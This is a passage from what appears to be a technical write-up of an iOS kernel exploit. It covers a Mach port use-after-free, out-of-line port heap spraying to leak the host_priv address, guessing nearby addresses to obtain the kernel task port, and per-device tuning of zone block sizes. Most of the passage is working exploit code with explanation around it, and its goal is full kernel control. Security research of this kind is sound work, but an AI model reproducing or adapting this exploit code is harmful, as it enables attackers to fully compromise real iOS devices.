    ports_length = count * sizeof(mach_port_t);
    names_length = count * sizeof(mach_port_name_t);

    ...

    data = kalloc(ports_length);

    ...

#ifdef __LP64__
    mach_port_name_t *names = &((mach_port_name_t *)data)[count];
#else
    mach_port_name_t *names = ((mach_port_name_t *)data);
#endif

    if (copyinmap(map, addr, names, names_length) != KERN_SUCCESS) {
        ...
    }

    objects = (ipc_object_t *) data;
    dsc->address = data;

    for ( i = 0; i < count; i++) {
        mach_port_name_t name = names[i];
        ipc_object_t object;

        if (!MACH_PORT_VALID(name)) {
            objects[i] = (ipc_object_t)CAST_MACH_NAME_TO_PORT(name);
            continue;
        }

        kern_return_t kr = ipc_object_copyin(space, name, user_disp, &object);

        ...

        objects[i] = object;
    }

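If we set the name at the right position in the OOL port data to the host_priv port obtained earlier, then after the kernel processes the message, the address of the kernel object for host_priv is stored where the UAF port's ip_context member lives, so user space can read the real address of HOST_PRIV_PORT. The spraying code is in send_ool_ports: each descriptor allocates one kalloc.4096 chunk (0x200*8), so one message allocates 1000 4 KB pages in the kernel.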

  size_t n_ports = 0x200;
    mach_port_t* ports = calloc(sizeof(mach_port_t), n_ports);
    uint32_t obj_offset = 0x90;
    for (int i = 0; i < n_ports_in_zone; i++) {
        uint32_t index = (obj_offset & 0xfff) / 8;
        ports[index] = to_send;
        obj_offset += 0xa8;
    }

    // build a message with those ool ports:
    struct ool_multi_msg* leak_msg = malloc(sizeof(struct ool_multi_msg));
    memset(leak_msg, 0, sizeof(struct ool_msg));

    leak_msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    leak_msg->hdr.msgh_size = sizeof(struct ool_msg);
    leak_msg->hdr.msgh_remote_port = q;
    leak_msg->hdr.msgh_local_port = MACH_PORT_NULL;
    leak_msg->hdr.msgh_id = 0x41414141;

    leak_msg->body.msgh_descriptor_count = 1000;

    for (int i = 0; i < 1000; i++) {
        leak_msg->ool_ports[i].address = ports;
        leak_msg->ool_ports[i].count = n_ports;
        leak_msg->ool_ports[i].deallocate = 0;
        leak_msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
        leak_msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
        leak_msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
    }
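The index arithmetic in the spray loop can be checked in isolation. The helper below (our name) repeats it for the i-th port of a block: with 0xa8-byte ports and ip_context at 0x90, the host_priv name lands in slot 18 for the first port and then every 21 slots (0xa8 / 8), always inside the 0x200-entry array because of the `& 0xfff` mask.

```c
#include <assert.h>
#include <stdint.h>

#define PORT_SIZE      0xa8u  /* port object size on 64-bit, per the text */
#define CONTEXT_OFFSET 0x90u  /* offset of ip_context */

/* Slot of the 0x200-entry OOL array that overlaps ip_context of the i-th
 * port in a block, computed the same way as the spray loop above. */
static uint32_t context_slot(uint32_t i)
{
    uint32_t obj_offset = CONTEXT_OFFSET + PORT_SIZE * i;
    return (obj_offset & 0xfff) / 8;
}
```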

Once the freed port has been refilled, its context value can be read:

    // get the target page reused by the ool port pointers
    for (int i = 0; i < n_ool_port_qs; i++) {
        ool_port_qs[i] = send_ool_ports(host_priv);
    }

    uint64_t context = 123;
    mach_port_get_context(mach_task_self(), middle_ports[0], &context);
    printf("read context value: 0x%llx\n", context);

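Obtaining the kernel task port

HOST_PRIV_PORT is created by ipc_init, which is called from the system initialization function kernel_bootstrap, while the kernel task port is created later in task_init. So there is a good chance that these two port objects are close to each other in memory.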

void
kernel_bootstrap(void)
{
    ...

    kernel_bootstrap_log("ipc_init");
    ipc_init();

    kernel_bootstrap_log("PMAP_ACTIVATE_KERNEL");
    PMAP_ACTIVATE_KERNEL(master_cpu);

    kernel_bootstrap_log("mapping_free_prime");
    mapping_free_prime();                       /* Load up with temporary mapping blocks */

    kernel_bootstrap_log("machine_init");
    machine_init();

    kernel_bootstrap_log("clock_init");
    clock_init();

    ledger_init();

    kernel_bootstrap_log("task_init");
    task_init();

    ...
}

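Just as the kernel performs copyin processing when it receives a MACH_MSG_OOL_PORTS_DESCRIPTOR, it performs copyout processing when the message is returned to user space, translating real port object addresses back into names. We can set the context of the UAF port to the address of a port near HOST_PRIV_PORT; once user space gets the name back, pid_for_task tells us whether we have obtained the kernel task port. receive_ool_ports receives the spray messages sent earlier and checks the returned names for a possible kernel task port.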

    // Excerpt from receive_ool_ports(q, expected, valid_kernel_pointer).
    // Receive one of the previously sent spray messages from queue q.
    struct ool_multi_msg_rcv msg = {0};
    kern_return_t err = mach_msg(&msg.hdr,
                   MACH_RCV_MSG,
                   0,
                   sizeof(struct ool_multi_msg_rcv),
                   q,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    if (err != KERN_SUCCESS) {
        printf("failed to receive ool ports msg (%s)\n", mach_error_string(err));
        exit(EXIT_FAILURE);
    }

    mach_port_t interesting_port = MACH_PORT_NULL;
    mach_port_t kernel_task_port = MACH_PORT_NULL;

    // Walk every OOL ports descriptor in the message (1000 per message here).
    for (int i = 0; i < 1000; i++) {
        mach_msg_ool_ports_descriptor_t* ool_desc = &msg.ool_ports[i];
        mach_port_t* ool_ports = (mach_port_t*)ool_desc->address;
        for (size_t j = 0; j < ool_desc->count; j++) {
            mach_port_t port = ool_ports[j];
            // Names of the originally sprayed port, or empty slots, are uninteresting.
            if (port == expected || port == MACH_PORT_NULL)
                continue;
            // Any other name presumably comes from a pointer planted via the UAF port's context.
            interesting_port = port;
            printf("found an interesting port 0x%x\n", port);
            if (kernel_task_port == MACH_PORT_NULL &&
                is_port_kernel_task_port(interesting_port, valid_kernel_pointer))
            {
                kernel_task_port = interesting_port;
            }
        }
        // Free the out-of-line array the kernel mapped into our address space.
        mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)ool_desc->address, ((ool_desc->count*4)+0xfff)&~0xfff);
    }

The exploit prepares 0x20 UAF ports and starts guessing from the middle of the zone block that contains the HOST_PRIV_PORT address.

    for (int i = 0; i < n_middle_ports; i++) {
        // guess the middle slots in the zone block:
        mach_port_set_context(mach_task_self(), middle_ports[i], pages_base+(0xa8 * ((n_ports_in_zone/2) - (n_middle_ports/2) + i)));
    }

    mach_port_t kernel_task_port = MACH_PORT_NULL;
    for (int i = 0; i < n_ool_port_qs; i++) {
        mach_port_t new_port = receive_ool_ports(ool_port_qs[i], host_priv, pages_base);
        if (new_port != MACH_PORT_NULL) {
            kernel_task_port = new_port;
        }
    }

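Increasing the number of prepared UAF ports (up to the number of ports that fit in one zone block) raises the hit rate. One further improvement to the code above is to allocate some extra ports right before receiving the messages: the zone block holding HOST_PRIV_PORT may contain the addresses of ports that have already been freed, and copying out such an address causes a panic, so filling these holes improves stability.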

Device Differences

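The iOS kernel heap is managed by zones; the implementation can be found in zalloc.c. The size of each zone's allocation block is computed in zinit, where ZONE_MAX_ALLOC_SIZE is fixed at 0x8000: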

    if (alloc == 0)
        alloc = PAGE_SIZE;

    alloc = round_page(alloc);
    max   = round_page(max);

    vm_size_t best_alloc = PAGE_SIZE;
    vm_size_t alloc_size;
    for (alloc_size = (2 * PAGE_SIZE); alloc_size <= ZONE_MAX_ALLOC_SIZE; alloc_size += PAGE_SIZE) {
        if (ZONE_ALLOC_FRAG_PERCENT(alloc_size, size) < ZONE_ALLOC_FRAG_PERCENT(best_alloc, size)) {
            best_alloc = alloc_size;
        }
    }
    alloc = best_alloc;

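Note that PAGE_SIZE on iOS can be either 0x1000 or 0x4000. The initialization of PAGE_SHIFT_CONST (decompiled below) shows that when the device has more than 1 GB (0x40000000) of RAM, the page shift is 14 and PAGE_SIZE is 0x4000; otherwise the shift is 12 and PAGE_SIZE is 0x1000.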

  if ( v139 )
  {
    v14 = 14;
    if ( *(_QWORD *)(a1 + 24) <= 0x40000000uLL )
      v15 = 12;
    else
      v15 = 14;
  }
  else
  {
    if ( (unsigned int)sub_FFFFFFF0074F2BE4("-use_hwpagesize", &v142, 4, 0) )
      v15 = 12;
    else
      v15 = 14;
    v14 = v15;
  }
  PAGE_SHIFT_CONST = v15;

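Every device from the iPhone 6s onward has at least 2 GB of RAM, so its kernel uses a minimum page size of 16 KB. Following the calculation in zinit, the ipc ports zone block is 0x3000 bytes on devices before the 6s and 0x4000 bytes on the 6s and later, so guessing every port in a block takes 0x49 or 0x61 UAF ports respectively. The exploit's platform_detection can be modified accordingly: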

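#include <sys/sysctl.h>

void platform_detection(void) {
    // hw.memsize is 64-bit; a 32-bit buffer drops the high bits (4 GB would read as 0).
    uint64_t hwmem = 0;
    size_t hwmem_size = sizeof(hwmem);
    if (sysctlbyname("hw.memsize", &hwmem, &hwmem_size, NULL, 0) != 0) {
        printf("failed to read hw.memsize\n");
        exit(EXIT_FAILURE);
    }
    printf("hw memory is 0x%llx bytes\n", (unsigned long long)hwmem);
    // More than 1 GB of RAM => 16 KB pages => 0x4000-byte ipc ports zone blocks.
    if (hwmem > 0x40000000)
        n_ports_in_zone = 0x4000/0xa8;   // 0x61 ports
    else
        n_ports_in_zone = 0x3000/0xa8;   // 0x49 ports
}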